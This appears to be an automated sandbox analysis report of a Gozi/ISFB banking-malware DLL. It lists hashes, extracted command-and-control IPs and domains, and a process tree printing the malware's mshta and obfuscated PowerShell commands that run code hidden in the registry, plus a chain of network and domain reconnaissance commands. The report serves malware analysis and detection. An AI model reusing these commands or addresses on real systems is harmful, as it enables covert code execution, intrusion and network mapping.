Analysis
max time kernel: 150s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20220721-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220721-en, locale:en-us, os:windows10-2004-x64, system
submitted: 03-08-2022 10:56
Static task
static1
Behavioral task
behavioral1
Sample
8fcfb8f38d8607c57f08f9b39139065f.dll
Resource
win7-20220715-en
General
Target: 8fcfb8f38d8607c57f08f9b39139065f.dll
Size: 300KB
MD5: 8fcfb8f38d8607c57f08f9b39139065f
SHA1: 805bb719009145dcc32b5361abf5bb4d91015dbb
SHA256: ee46bd47dbd009333a72bc752b3d38d5a87a25f90fef3d4d77515d4fd11f3c8d
SHA512: 6d02b5338e387185520c45a45434bf5e949fdfd66d484459c3e817b76fbfc50621d0fbd5e4e5f3618f02ea257b8d73a53637b7bc791cc40300e837e2de72007f
Malware Config
Extracted
gozi_ifsb
3000
config.edge.skype.com
37.120.206.71
37.120.206.84
193.106.191.163
base_path: /drew/
build: 250240
exe_type: loader
extension: .jlk
server_id: 50
Extracted
gozi_ifsb
3000
37.120.206.91
37.120.206.95
havefuntxmm.at
5.42.199.57
xerkdeoleone.at
base_path: /images/
build: 250240
exe_type: worker
extension: .jlk
server_id: 50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: mshta.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation | mshta.exe
-
Suspicious use of SetThreadContext 5 IoCs
Processes: powershell.exe, Explorer.EXE
description | pid | process | target process
PID 1728 set thread context of 2588 | 1728 | powershell.exe | Explorer.EXE
PID 2588 set thread context of 3396 | 2588 | Explorer.EXE | RuntimeBroker.exe
PID 2588 set thread context of 3664 | 2588 | Explorer.EXE | RuntimeBroker.exe
PID 2588 set thread context of 3520 | 2588 | Explorer.EXE | RuntimeBroker.exe
PID 2588 set thread context of 4752 | 2588 | Explorer.EXE | cmd.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Discovers systems in the same network 1 TTPs 3 IoCs
Processes: net.exe, net.exe, net.exe
pid | process
676 | net.exe
856 | net.exe
3360 | net.exe
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies registry class 56 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
pid | process
2588 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 5 IoCs
Processes: powershell.exe, Explorer.EXE
pid | process
1728 | powershell.exe
2588 | Explorer.EXE
2588 | Explorer.EXE
2588 | Explorer.EXE
2588 | Explorer.EXE
-
Suspicious use of AdjustPrivilegeToken 48 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes: Explorer.EXE
pid | process
2588 | Explorer.EXE
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3396
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll1⤵
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3664
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2588 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"5⤵PID:4544
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4568 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"5⤵PID:3680
-
C:\Windows\system32\cmd.exe cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵
- Suspicious use of WriteProcessMemory
PID:4584
-
C:\Windows\System32\Wbem\WMIC.exe wmic computersystem get domain 3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
C:\Windows\system32\more.com more 3⤵ PID:1984
-
C:\Windows\syswow64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , 2⤵ PID:4752
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4372
-
C:\Windows\system32\cmd.exe cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵
- Suspicious use of WriteProcessMemory
PID:2816
-
C:\Windows\system32\systeminfo.exe systeminfo.exe 3⤵
- Gathers system information
PID:452
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4360
-
C:\Windows\system32\cmd.exe cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵
- Suspicious use of WriteProcessMemory
PID:4180
-
C:\Windows\system32\net.exe net view 3⤵
- Discovers systems in the same network
PID:676
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4652
-
C:\Windows\system32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵
- Suspicious use of WriteProcessMemory
PID:4836
-
C:\Windows\system32\nslookup.exe nslookup 127.0.0.1 3⤵ PID:3660
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:3548
-
C:\Windows\system32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵
- Suspicious use of WriteProcessMemory
PID:2040
-
C:\Windows\system32\tasklist.exe tasklist.exe /SVC 3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:3320
-
C:\Windows\system32\cmd.exe cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:1300
-
C:\Windows\system32\driverquery.exe driverquery.exe 3⤵ PID:4216
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:2084
-
C:\Windows\system32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4272
-
C:\Windows\system32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s 3⤵ PID:2836
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:2564
-
C:\Windows\system32\cmd.exe cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:1340
-
C:\Windows\system32\net.exe net config workstation 3⤵ PID:1748
-
C:\Windows\system32\net1.exe C:\Windows\system32\net1 config workstation 4⤵ PID:1732
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4812
-
C:\Windows\system32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4748
-
C:\Windows\system32\nltest.exe nltest /domain_trusts 3⤵ PID:4912
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4672
-
C:\Windows\system32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4768
-
C:\Windows\system32\nltest.exe nltest /domain_trusts /all_trusts 3⤵ PID:5028
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:3792
-
C:\Windows\system32\cmd.exe cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:2188
-
C:\Windows\system32\net.exe net view /all /domain 3⤵
- Discovers systems in the same network
PID:856
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:956
-
C:\Windows\system32\cmd.exe cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4008
-
C:\Windows\system32\net.exe net view /all 3⤵
- Discovers systems in the same network
PID:3360
-
C:\Windows\system32\cmd.exe cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:4384
-
C:\Windows\system32\cmd.exe cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1" 2⤵ PID:2172
-
C:\Windows\System32\RuntimeBroker.exe C:\Windows\System32\RuntimeBroker.exe -Embedding 1⤵
- Modifies registry class
PID:3520
Network
MITRE ATT&CK Enterprise v6
Downloads